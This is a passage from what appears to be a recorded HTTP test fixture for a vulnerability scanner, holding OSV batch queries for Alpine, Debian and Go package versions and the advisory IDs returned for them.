[ { "id": "DEBIAN-CVE-2017-17512", "modified": "2025-11-19T02:04:30.656495Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2005-2541", "modified": "2026-03-17T02:42:47.789952Z" }, { "id": "DEBIAN-CVE-2018-20482", "modified": "2025-11-19T02:02:47.070832Z" }, { "id": "DEBIAN-CVE-2019-9923", "modified": "2025-11-19T02:02:53.559001Z" }, { "id": "DEBIAN-CVE-2021-20193", "modified": "2025-11-19T01:01:55.139356Z" }, { "id": "DEBIAN-CVE-2022-48303", 
"modified": "2025-11-20T10:16:07.552593Z" }, { "id": "DEBIAN-CVE-2023-39804", "modified": "2025-11-20T10:16:41.587973Z" }, { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3051-1", "modified": "2025-05-26T07:01:56.257796Z" }, { "id": "DLA-3134-1", "modified": "2025-05-26T07:01:01.500124Z" }, { "id": "DLA-3161-1", "modified": "2025-05-26T07:01:03.882213Z" }, { "id": "DLA-3366-1", "modified": "2025-05-26T07:01:17.027142Z" }, { "id": "DLA-3412-1", "modified": "2025-05-26T07:01:20.109212Z" }, { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" }, { "id": "DLA-3972-1", "modified": "2025-05-26T07:02:05.284676Z" }, { "id": "DLA-4085-1", "modified": "2025-05-26T07:02:10.958749Z" }, { "id": "DLA-4105-1", "modified": "2025-05-26T07:02:13.921097Z" }, { "id": "DLA-4403-1", "modified": "2025-12-12T10:13:37.154747Z" } ] }, { "vulns": [ { "id": "DLA-4016-1", "modified": "2025-05-26T07:02:06.504254Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2016-2779", "modified": "2025-11-19T01:12:38.591462Z" }, { "id": "DEBIAN-CVE-2018-7738", "modified": "2025-11-20T10:13:54.493707Z" }, { "id": "DEBIAN-CVE-2021-37600", "modified": "2025-11-19T02:02:43.997954Z" }, { "id": "DEBIAN-CVE-2021-3995", "modified": "2025-11-20T10:15:45.587792Z" }, { "id": "DEBIAN-CVE-2021-3996", "modified": "2025-11-20T10:15:45.602424Z" }, { "id": "DEBIAN-CVE-2022-0563", "modified": "2026-03-17T02:46:43.123134Z" }, { "id": "DEBIAN-CVE-2024-28085", "modified": "2025-11-20T10:17:41.612682Z" }, { "id": "DEBIAN-CVE-2025-14104", "modified": "2026-03-05T17:00:58.361610Z" }, { "id": "DEBIAN-CVE-2026-3184", "modified": "2026-02-26T09:30:44.219098Z" }, { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" }, { "id": "DSA-5055-1", "modified": "2026-03-09T02:10:40.826335Z" }, { "id": "DSA-5650-1", "modified": "2026-03-09T02:08:30.371343Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", 
"modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DEBIAN-CVE-2024-3094", "modified": "2025-11-19T01:12:34.542011Z" }, { "id": "DEBIAN-CVE-2025-31115", "modified": "2025-11-20T10:18:07.484724Z" }, { "id": "DSA-5123-1", "modified": "2026-03-09T02:10:46.054497Z" }, { "id": "DSA-5895-1", "modified": "2026-03-09T02:08:52.515269Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "22298" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 19884 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": 
"musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" }, { "package": { "ecosystem": "Debian", "name": "adduser" }, "version": "3.115" }, { "package": { "ecosystem": "Debian", "name": "apt" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "base-files" }, "version": "9.9+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "base-passwd" }, "version": "3.5.43" }, { "package": { "ecosystem": "Debian", "name": "bash" }, "version": "4.4-5" }, { "package": { "ecosystem": "Debian", "name": "bsdutils" }, "version": "1:2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "coreutils" }, "version": "8.26-3" }, { "package": { "ecosystem": "Debian", "name": "dash" }, "version": "0.5.8-2.4" }, { "package": { "ecosystem": "Debian", "name": "debconf" }, "version": "1.5.61" }, { "package": { "ecosystem": "Debian", "name": "debian-archive-keyring" }, "version": "2017.5+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "debianutils" }, "version": "4.8.1.1" }, { "package": { "ecosystem": "Debian", "name": "diffutils" }, "version": "1:3.5-3" }, { "package": { "ecosystem": "Debian", "name": "dirmngr" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "dpkg" }, "version": "1.18.25" }, { "package": { "ecosystem": "Debian", "name": "e2fslibs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "e2fsprogs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "findutils" }, "version": "4.6.0+git+20161106-2" }, { "package": { "ecosystem": "Debian", "name": "gcc-6-base" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Go", "name": "github.com/opencontainers/runc" }, "version": "v1.0.1" }, { "package": { 
"ecosystem": "Go", "name": "github.com/tianon/gosu" }, "version": "(devel)" }, { "package": { "ecosystem": "Debian", "name": "gnupg" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "gnupg-agent" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Go", "name": "golang.org/x/sys" }, "version": "v0.0.0-20210817142637-7d9622a276b7" }, { "package": { "ecosystem": "Debian", "name": "gpgv" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "grep" }, "version": "2.27-2" }, { "package": { "ecosystem": "Debian", "name": "gzip" }, "version": "1.6-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "hostname" }, "version": "3.18+b1" }, { "package": { "ecosystem": "Debian", "name": "init-system-helpers" }, "version": "1.48" }, { "package": { "ecosystem": "Debian", "name": "libacl1" }, "version": "2.2.52-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libapt-pkg5.0" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "libassuan0" }, "version": "2.4.3-2" }, { "package": { "ecosystem": "Debian", "name": "libattr1" }, "version": "1:2.4.47-2+b2" }, { "package": { "ecosystem": "Debian", "name": "libaudit-common" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libaudit1" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libblkid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbsd0" }, "version": "0.8.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbz2-1.0" }, "version": "1.0.6-8.1" }, { "package": { "ecosystem": "Debian", "name": "libc-bin" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc-l10n" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc6" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libcap-ng0" }, "version": "0.7.7-3+b1" }, { "package": { "ecosystem": 
"Debian", "name": "libcomerr2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libdb5.3" }, "version": "5.3.28-12+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libdebconfclient0" }, "version": "0.227" }, { "package": { "ecosystem": "Debian", "name": "libedit2" }, "version": "3.1-20160903-3" }, { "package": { "ecosystem": "Debian", "name": "libfdisk1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libffi6" }, "version": "3.2.1-6" }, { "package": { "ecosystem": "Debian", "name": "libgcc1" }, "version": "1:6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgcrypt20" }, "version": "1.7.6-2+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libgdbm3" }, "version": "1.8.3-14" }, { "package": { "ecosystem": "Debian", "name": "libgmp10" }, "version": "2:6.1.2+dfsg-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgnutls30" }, "version": "3.5.8-5+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libgpg-error0" }, "version": "1.26-2" }, { "package": { "ecosystem": "Debian", "name": "libgssapi-krb5-2" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libhogweed4" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libicu57" }, "version": "57.1-6+deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libidn11" }, "version": "1.33-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libjson-perl" }, "version": "2.90-1" }, { "package": { "ecosystem": "Debian", "name": "libk5crypto3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkeyutils1" }, "version": "1.5.9-9" }, { "package": { "ecosystem": "Debian", "name": "libkrb5-3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkrb5support0" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libksba8" }, "version": "1.3.5-2" }, { "package": { 
"ecosystem": "Debian", "name": "libldap-2.4-2" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libldap-common" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libllvm6.0" }, "version": "1:6.0-1~bpo9+1" }, { "package": { "ecosystem": "Debian", "name": "liblz4-1" }, "version": "0.0~r131-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "liblzma5" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libmount1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libncurses5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libncursesw5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libnettle6" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libnpth0" }, "version": "1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libnss-wrapper" }, "version": "1.1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libp11-kit0" }, "version": "0.23.3-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules-bin" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-runtime" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam0g" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpcre3" }, "version": "2:8.39-3" }, { "package": { "ecosystem": "Debian", "name": "libperl5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "libpq5" }, "version": "14.2-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "libreadline7" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "libsasl2-2" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", 
"name": "libsasl2-modules-db" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libselinux1" }, "version": "2.6-3+b3" }, { "package": { "ecosystem": "Debian", "name": "libsemanage-common" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsemanage1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsepol1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsmartcols1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsqlite3-0" }, "version": "3.16.2-5+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libss2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libssl1.1" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libstdc++6" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsystemd0" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libtasn1-6" }, "version": "4.10-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libtinfo5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libudev1" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libustr-1.0-1" }, "version": "1.0.4-6" }, { "package": { "ecosystem": "Debian", "name": "libuuid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libxml2" }, "version": "2.9.4+dfsg1-2.2+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libxslt1.1" }, "version": "1.1.29-2.1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libzstd1" }, "version": "1.1.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "locales" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "login" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "lsb-base" }, "version": 
"9.20161125" }, { "package": { "ecosystem": "Debian", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian", "name": "mount" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "multiarch-support" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "ncurses-base" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "ncurses-bin" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "netbase" }, "version": "5.4" }, { "package": { "ecosystem": "Debian", "name": "openssl" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "passwd" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "perl" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-base" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-modules-5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "pgdg-keyring" }, "version": "2018.2" }, { "package": { "ecosystem": "Debian", "name": "pinentry-curses" }, "version": "1.0.0-2" }, { "package": { "ecosystem": "Debian", "name": "postgresql-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "readline-common" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "sed" }, "version": "4.4-1" }, { "package": { "ecosystem": "Debian", "name": "sensible-utils" }, "version": "0.0.9+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "ssl-cert" }, "version": "1.0.39" }, { "package": { "ecosystem": 
"Debian", "name": "sysvinit-utils" }, "version": "2.88dsf-59.9" }, { "package": { "ecosystem": "Debian", "name": "tar" }, "version": "1.29b-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "tzdata" }, "version": "2021a-0+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "ucf" }, "version": "3.0036" }, { "package": { "ecosystem": "Debian", "name": "util-linux" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "xz-utils" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zlib1g" }, "version": "1:1.2.8.dfsg-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zstd" }, "version": "1.1.2-1+deb9u1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_multiple_files url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 21542 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-3374", "modified": "2026-03-17T02:42:42.368242Z" }, { "id": "DEBIAN-CVE-2018-0501", "modified": "2025-11-19T02:04:24.786271Z" }, { "id": "DEBIAN-CVE-2019-3462", "modified": "2025-11-19T02:02:50.288367Z" }, { "id": "DEBIAN-CVE-2020-27350", "modified": "2025-11-19T01:06:21.507844Z" }, { "id": "DEBIAN-CVE-2020-3810", "modified": "2025-11-19T01:08:53.168851Z" }, { "id": "DSA-4685-1", "modified": "2026-03-09T02:09:03.263738Z" }, { "id": "DSA-4808-1", "modified": 
"2026-03-09T02:11:17.119108Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-18276", "modified": "2025-11-19T01:19:06.470662Z" }, { "id": "DEBIAN-CVE-2022-3715", "modified": "2026-03-17T02:47:45.184492Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-2781", "modified": "2026-03-17T02:44:35.752995Z" }, { "id": "DEBIAN-CVE-2017-18018", "modified": "2026-03-17T02:45:06.555217Z" }, { "id": "DEBIAN-CVE-2024-0684", "modified": "2025-11-19T01:02:00.374806Z" }, { "id": "DEBIAN-CVE-2025-5278", "modified": "2026-03-17T02:52:23.723753Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": "2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1664", "modified": "2025-11-20T10:15:48.083782Z" }, { "id": "DEBIAN-CVE-2025-6297", "modified": "2026-03-17T02:50:41.230667Z" }, { "id": "DEBIAN-CVE-2026-2219", "modified": "2026-03-14T15:06:12.109941Z" }, { "id": "DLA-3022-1", "modified": "2026-03-09T01:23:37.553205Z" }, { "id": "DSA-5147-1", "modified": "2026-03-09T02:10:11.335992Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-5094", "modified": "2025-11-19T02:02:52.019166Z" }, { "id": "DEBIAN-CVE-2019-5188", "modified": "2025-11-19T01:01:51.904490Z" }, { "id": "DEBIAN-CVE-2022-1304", "modified": "2025-11-20T10:15:47.847878Z" }, { "id": "DLA-3910-1", "modified": "2026-03-09T01:22:32.343795Z" }, { "id": "DSA-4535-1", "modified": "2026-03-09T02:10:12.902574Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-9493-h29p-rfm2", "modified": "2026-02-04T03:47:55.536228Z" }, { "id": "GHSA-cgrx-mc8f-2prm", "modified": "2026-02-04T02:50:45.342760Z" }, { "id": "GHSA-f3fp-gc8g-vw66", "modified": "2026-02-04T04:15:59.735117Z" }, { "id": "GHSA-g2j6-57v7-gm8c", "modified": "2026-02-04T02:43:58.212471Z" }, { "id": "GHSA-jfvp-7x6p-h2pv", "modified": "2026-02-04T03:12:37.981869Z" }, { "id": "GHSA-m8cg-xc2p-r3fc", "modified": "2026-02-04T03:29:19.767788Z" }, { "id": "GHSA-qw9x-cqr3-wc7r", "modified": "2026-02-04T02:13:22.313241Z" }, { "id": 
"GHSA-v95c-p5hm-xq8f", "modified": "2026-03-13T22:16:11.684125Z" }, { "id": "GHSA-vpvm-3wq2-2wvm", "modified": "2026-02-04T02:53:37.613379Z" }, { "id": "GHSA-xr7r-f8xq-vfvv", "modified": "2026-02-04T03:18:48.377509Z" }, { "id": "GO-2022-0274", "modified": "2026-02-04T02:26:28.343240Z" }, { "id": "GO-2022-0452", "modified": "2026-02-04T03:17:02.340230Z" }, { "id": "GO-2023-1627", "modified": "2026-02-04T03:58:42.107712Z" }, { "id": "GO-2023-1682", "modified": "2026-02-04T02:59:23.815900Z" }, { "id": "GO-2023-1683", "modified": "2026-02-04T04:01:58.343687Z" }, { "id": "GO-2024-2491", "modified": "2026-02-04T02:39:00.262696Z" }, { "id": "GO-2024-3110", "modified": "2026-02-04T02:23:26.560077Z" }, { "id": "GO-2025-4096", "modified": "2026-02-04T03:11:33.546218Z" }, { "id": "GO-2025-4097", "modified": "2026-02-04T03:00:55.376695Z" }, { "id": "GO-2025-4098", "modified": "2026-02-04T02:52:46.004719Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-p782-xgp4-8hr8", "modified": "2026-02-04T04:15:14.486111Z" }, { "id": "GO-2022-0493", "modified": "2026-02-04T03:42:54.589715Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DSA-5122-1", "modified": "2026-03-09T02:09:10.163691Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-0379", "modified": "2025-11-19T01:06:25.120079Z" }, { "id": "DEBIAN-CVE-2017-7526", "modified": "2025-11-19T02:04:40.318681Z" }, { "id": "DEBIAN-CVE-2018-0495", "modified": "2025-11-19T02:04:27.207183Z" }, { "id": "DEBIAN-CVE-2018-6829", "modified": "2026-03-10T05:05:47.263837Z" }, { "id": "DEBIAN-CVE-2019-13627", "modified": "2025-11-19T01:12:35.581705Z" }, { "id": "DEBIAN-CVE-2021-33560", "modified": "2026-03-10T05:07:08.938163Z" }, { "id": "DEBIAN-CVE-2021-40528", "modified": "2025-11-19T01:01:59.995618Z" }, { "id": "DEBIAN-CVE-2024-2236", "modified": "2026-03-10T05:09:58.705229Z" } ] }, {}, {}, {}, {}, 
{}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-10790", "modified": "2025-11-19T01:01:57.855157Z" }, { "id": "DEBIAN-CVE-2018-1000654", "modified": "2025-11-19T02:02:40.642360Z" }, { "id": "DEBIAN-CVE-2018-6003", "modified": "2025-11-19T01:06:22.990063Z" }, { "id": "DEBIAN-CVE-2021-46848", "modified": "2025-11-20T10:15:14.681077Z" }, { "id": "DEBIAN-CVE-2024-12133", "modified": "2025-11-20T10:17:02.620233Z" }, { "id": "DEBIAN-CVE-2025-13151", "modified": "2026-01-20T05:13:20.502324Z" }, { "id": "DLA-3263-1", "modified": "2026-03-09T01:22:34.273046Z" }, { "id": "DLA-4061-1", "modified": "2026-03-09T01:20:16.124977Z" }, { "id": "DSA-5863-1", "modified": "2026-03-09T02:08:50.747280Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-3709", "modified": "2025-11-20T10:12:11.931996Z" }, { "id": "DEBIAN-CVE-2016-9318", "modified": "2025-11-19T02:02:45.582059Z" }, { "id": "DEBIAN-CVE-2017-0663", "modified": "2025-11-19T02:02:52.056836Z" }, { "id": "DEBIAN-CVE-2017-15412", "modified": "2025-11-19T01:08:49.499099Z" }, { "id": "DEBIAN-CVE-2017-16931", "modified": "2025-11-19T02:04:25.542166Z" }, { "id": "DEBIAN-CVE-2017-16932", "modified": "2025-11-19T01:04:39.458229Z" }, { "id": "DEBIAN-CVE-2017-18258", "modified": "2025-11-19T01:08:48.927062Z" }, { "id": "DEBIAN-CVE-2017-5130", "modified": "2025-11-19T01:03:12.822124Z" }, { "id": "DEBIAN-CVE-2017-5969", "modified": "2025-11-19T01:08:52.062516Z" }, { "id": "DEBIAN-CVE-2017-7375", "modified": "2025-11-19T02:02:48.011785Z" }, { "id": "DEBIAN-CVE-2017-7376", "modified": "2025-11-19T02:01:17.016443Z" }, { "id": "DEBIAN-CVE-2017-8872", "modified": "2025-11-19T02:04:31.920669Z" }, { "id": "DEBIAN-CVE-2017-9047", "modified": "2025-11-19T02:04:30.335407Z" }, { "id": "DEBIAN-CVE-2017-9048", "modified": "2025-11-19T01:19:09.303210Z" }, { "id": "DEBIAN-CVE-2017-9049", 
"modified": "2025-11-19T01:03:12.259406Z" }, { "id": "DEBIAN-CVE-2017-9050", "modified": "2025-11-19T01:08:53.069573Z" }, { "id": "DEBIAN-CVE-2018-14404", "modified": "2025-11-19T01:12:32.274520Z" }, { "id": "DEBIAN-CVE-2018-14567", "modified": "2025-11-19T01:08:49.660035Z" }, { "id": "DEBIAN-CVE-2019-19956", "modified": "2025-11-19T02:01:17.970372Z" }, { "id": "DEBIAN-CVE-2019-20388", "modified": "2025-11-19T02:04:37.363509Z" }, { "id": "DEBIAN-CVE-2020-24977", "modified": "2025-11-19T02:04:41.266003Z" }, { "id": "DEBIAN-CVE-2020-7595", "modified": "2025-11-19T02:04:29.271836Z" }, { "id": "DEBIAN-CVE-2021-3516", "modified": "2025-11-19T02:01:14.946107Z" }, { "id": "DEBIAN-CVE-2021-3517", "modified": "2025-11-19T01:12:34.981900Z" }, { "id": "DEBIAN-CVE-2021-3518", "modified": "2025-11-19T01:19:08.645337Z" }, { "id": "DEBIAN-CVE-2021-3537", "modified": "2025-11-19T02:04:30.248276Z" }, { "id": "DEBIAN-CVE-2021-3541", "modified": "2025-11-19T02:04:36.614917Z" }, { "id": "DEBIAN-CVE-2022-2309", "modified": "2025-11-20T10:15:28.694644Z" }, { "id": "DEBIAN-CVE-2022-23308", "modified": "2025-11-20T10:15:29.029152Z" }, { "id": "DEBIAN-CVE-2022-29824", "modified": "2025-11-20T10:15:52.814213Z" }, { "id": "DEBIAN-CVE-2022-40303", "modified": "2025-11-20T10:16:01.982632Z" }, { "id": "DEBIAN-CVE-2022-40304", "modified": "2025-11-20T10:16:01.918054Z" }, { "id": "DEBIAN-CVE-2022-49043", "modified": "2025-11-20T10:16:12.358770Z" }, { "id": "DEBIAN-CVE-2023-28484", "modified": "2025-11-20T10:16:35.199991Z" }, { "id": "DEBIAN-CVE-2023-29469", "modified": "2025-11-20T10:17:34.943682Z" }, { "id": "DEBIAN-CVE-2023-39615", "modified": "2025-11-20T10:16:41.593841Z" }, { "id": "DEBIAN-CVE-2023-45322", "modified": "2025-11-20T10:16:44.891362Z" }, { "id": "DEBIAN-CVE-2024-25062", "modified": "2025-11-20T10:17:04.986212Z" }, { "id": "DEBIAN-CVE-2024-34459", "modified": "2025-11-20T10:17:41.570595Z" }, { "id": "DEBIAN-CVE-2024-56171", "modified": "2025-11-20T10:17:48.605695Z" }, { "id": 
